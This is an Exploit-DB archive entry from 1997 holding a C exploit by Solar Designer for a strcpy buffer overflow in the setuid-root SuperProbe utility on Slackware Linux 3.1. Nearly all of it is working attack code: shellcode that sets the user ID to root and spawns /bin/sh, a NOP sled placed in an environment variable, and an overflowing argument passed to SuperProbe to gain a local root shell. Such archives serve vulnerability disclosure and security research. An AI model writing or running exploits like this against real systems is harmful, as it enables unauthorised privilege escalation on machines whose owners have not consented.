Slackware Linux 3.1 - '/usr/X11/bin/SuperProbe' Local Buffer Overflow

EDB-ID:

19283


Author:

Solar

Type:

local


Platform:

Linux

Date:

1997-03-04


/*
source: https://www.securityfocus.com/bid/364/info

superprobe is an program supplied with XFree86 that helps determine video hardware. It is shipped with Slackware Linux 3.1 and is installed setuid root. There is an exploitable strcpy buffer overflow in the TestChip() function which allows for a trivial local root compromise.
*/

/*
* SuperProbe buffer overflow exploit for Linux, tested on Slackware 3.1
* Copyright (c) 1997 by Solar Designer
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *shellcode =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x8d\x51\x04\x89\xcf\x89\x02\xb0\x2e\x40\xfc\xae\x75\xfd"
"\x89\x39\x89\xfb\x40\xae\x75\xfd\x88\x67\xff\xb0\x0b\xcd\x80\x31\xc0\x40"
"\x31\xdb\xcd\x80/"
"/bin/sh"
"0";
char *get_sp() {
asm("movl %esp,%eax");
}
#define bufsize 8192
#define alignment 0
char buffer[bufsize];
main() {
int i;
for (i = 0; i < bufsize / 2; i += 4)
*(char **)&buffer[i] = get_sp() - 2048;
memset(&buffer[bufsize / 2], 0x90, bufsize / 2);
strcpy(&buffer[bufsize - 256], shellcode);
setenv("SHELLCODE", buffer, 1);
memset(buffer, 'x', 72);
*(char **)&buffer[72] = get_sp() - 6144 - alignment;
buffer[76] = 0;
execl("/usr/X11/bin/SuperProbe", "SuperProbe", "-nopr", buffer, NULL);
}